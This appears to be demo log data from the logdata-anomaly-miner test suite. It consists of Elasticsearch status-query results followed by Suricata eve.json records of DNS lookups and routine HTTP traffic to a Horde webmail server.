{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"2zPzLXYBIkOurnXXMIjN","_score":1.0,"_source":{"FromTime":1.607088671024308E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":1723,"/parser/model/php":0,"/parser/model/status_code":9,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:21.062Z","ToTime":1.607088681024395E9,"fromtimestamp":"2020-12-04T13:31:11.024Z","totimestamp":"2020-12-04T13:31:21.024Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"4TPzLXYBIkOurnXXWYgr","_score":1.0,"_source":{"FromTime":1.607088681354751E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":17,"/parser/model/type_str":1715,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:31.396Z","ToTime":1.607088691354804E9,"fromtimestamp":"2020-12-04T13:31:21.354Z","totimestamp":"2020-12-04T13:31:31.354Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"5TPzLXYBIkOurnXXgoi1","_score":1.0,"_source":{"FromTime":1.607088691965782E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":24,"/parser/model/type_str":3070,"/parser/model/php":0,"/parser/model/status_code":5,"/parser/model/host":4,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:42.030Z","ToTime":1.60708870196585E9,"fromtimestamp":"2020-12-04T13:31:31.965Z","totimestamp":"2020-12-04T13:31:41.965Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"6zPzLXYBIkOurnXXq4gV","_score":1.0,"_source":{"FromTime":1.607088702327717E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":18,"/parser/model/type_str":1887,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:31:52.365Z","ToTime":1.607088712327798E9,"fromtimestamp":"2020-12-04T13:31:42.327Z","totimestamp":"2020-12-04T13:31:52.327Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"7zPzLXYBIkOurnXX0oiK","_score":1.0,"_source":{"FromTime":1.607088712407204E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":1,"/parser/model/type_str":323,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:02.467Z","ToTime":1.607088722407292E9,"fromtimestamp":"2020-12-04T13:31:52.407Z","totimestamp":"2020-12-04T13:32:02.407Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"8zPzLXYBIkOurnXX-ogA","_score":1.0,"_source":{"FromTime":1.607088722502143E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":318,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:12.569Z","ToTime":1.607088732502287E9,"fromtimestamp":"2020-12-04T13:32:02.502Z","totimestamp":"2020-12-04T13:32:12.502Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"-DP0LXYBIkOurnXXF4gX","_score":1.0,"_source":{"FromTime":1.607088729964115E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":3,"/parser/model/type_str":2343,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:20.017Z","ToTime":1.607088739964161E9,"fromtimestamp":"2020-12-04T13:32:09.964Z","totimestamp":"2020-12-04T13:32:19.964Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_TP0LXYBIkOurnXXQYjJ","_score":1.0,"_source":{"FromTime":1.607088740904546E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":25,"/parser/model/type_str":4933,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:30.946Z","ToTime":1.607088750904612E9,"fromtimestamp":"2020-12-04T13:32:20.904Z","totimestamp":"2020-12-04T13:32:30.904Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_zP0LXYBIkOurnXXSYi3","_score":1.0,"_source":{"FromTime":1.607088742920283E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:32.977Z","ToTime":1.607088752920326E9,"fromtimestamp":"2020-12-04T13:32:22.920Z","totimestamp":"2020-12-04T13:32:32.920Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"AzP0LXYBIkOurnXXcYlB","_score":1.0,"_source":{"FromTime":1.60708875305248E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":517,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:43.098Z","ToTime":1.607088763052544E9,"fromtimestamp":"2020-12-04T13:32:33.052Z","totimestamp":"2020-12-04T13:32:43.052Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CTP0LXYBIkOurnXXmYl8","_score":1.0,"_source":{"FromTime":1.607088763350645E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":1221,"/parser/model/php":0,"/parser/model/status_code":17,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:53.397Z","ToTime":1.607088773350717E9,"fromtimestamp":"2020-12-04T13:32:43.350Z","totimestamp":"2020-12-04T13:32:53.350Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DTP0LXYBIkOurnXXwIn-","_score":1.0,"_source":{"FromTime":1.607088773468664E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":461,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:03.511Z","ToTime":1.607088783468755E9,"fromtimestamp":"2020-12-04T13:32:53.468Z","totimestamp":"2020-12-04T13:33:03.468Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EjP0LXYBIkOurnXX6ok5","_score":1.0,"_source":{"FromTime":1.607088784026072E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":2426,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:14.066Z","ToTime":1.607088794026145E9,"fromtimestamp":"2020-12-04T13:33:04.026Z","totimestamp":"2020-12-04T13:33:14.026Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GDP1LXYBIkOurnXXEYmz","_score":1.0,"_source":{"FromTime":1.607088794130318E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":401,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:24.172Z","ToTime":1.60708880413046E9,"fromtimestamp":"2020-12-04T13:33:14.130Z","totimestamp":"2020-12-04T13:33:24.130Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HDP1LXYBIkOurnXXOYks","_score":1.0,"_source":{"FromTime":1.607088804238838E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":419,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:34.277Z","ToTime":1.607088814238905E9,"fromtimestamp":"2020-12-04T13:33:24.238Z","totimestamp":"2020-12-04T13:33:34.238Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ITP1LXYBIkOurnXXYIlW","_score":1.0,"_source":{"FromTime":1.607088814261893E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:44.303Z","ToTime":1.607088824261959E9,"fromtimestamp":"2020-12-04T13:33:34.261Z","totimestamp":"2020-12-04T13:33:44.261Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JjP1LXYBIkOurnXXh4l_","_score":1.0,"_source":{"FromTime":1.607088824290643E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":5347,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:54.328Z","ToTime":1.607088834290724E9,"fromtimestamp":"2020-12-04T13:33:44.290Z","totimestamp":"2020-12-04T13:33:54.290Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KzP1LXYBIkOurnXXsImn","_score":1.0,"_source":{"FromTime":1.607088834826981E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":46,"/parser/model/type_str":2788,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:04.864Z","ToTime":1.60708884482705E9,"fromtimestamp":"2020-12-04T13:33:54.826Z","totimestamp":"2020-12-04T13:34:04.827Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LzP1LXYBIkOurnXX2Ik0","_score":1.0,"_source":{"FromTime":1.607088844951758E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":538,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:14.989Z","ToTime":1.607088854951834E9,"fromtimestamp":"2020-12-04T13:34:04.951Z","totimestamp":"2020-12-04T13:34:14.951Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NTP1LXYBIkOurnXX_4nQ","_score":1.0,"_source":{"FromTime":1.607088855090159E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":653,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:25.129Z","ToTime":1.607088865090244E9,"fromtimestamp":"2020-12-04T13:34:15.090Z","totimestamp":"2020-12-04T13:34:25.090Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"OjP2LXYBIkOurnXXJ4lZ","_score":1.0,"_source":{"FromTime":1.607088865212616E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":502,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:35.250Z","ToTime":1.607088875212694E9,"fromtimestamp":"2020-12-04T13:34:25.212Z","totimestamp":"2020-12-04T13:34:35.212Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PjP2LXYBIkOurnXXT4n4","_score":1.0,"_source":{"FromTime":1.607088875611484E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":2205,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:45.649Z","ToTime":1.607088885611568E9,"fromtimestamp":"2020-12-04T13:34:35.611Z","totimestamp":"2020-12-04T13:34:45.611Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RDP2LXYBIkOurnXXeIkn","_score":1.0,"_source":{"FromTime":1.607088885898558E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":1542,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:55.936Z","ToTime":1.607088895898649E9,"fromtimestamp":"2020-12-04T13:34:45.898Z","totimestamp":"2020-12-04T13:34:55.898Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"SDP2LXYBIkOurnXXoYl8","_score":1.0,"_source":{"FromTime":1.607088896465222E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":3152,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:35:06.517Z","ToTime":1.607088906465292E9,"fromtimestamp":"2020-12-04T13:34:56.465Z","totimestamp":"2020-12-04T13:35:06.465Z","version":"1"}}]}} logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/eve.json000066400000000000000000077225761437606560100313640ustar00rootroot00000000000000{"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:01.126898+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768}} {"timestamp":"2020-02-29T00:00:02.592153+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:02.626782+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":16}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:02.763084+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":17}} {"timestamp":"2020-02-29T00:00:02.774030+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:00:02.953009+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":17}} {"timestamp":"2020-02-29T00:00:02.955593+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} 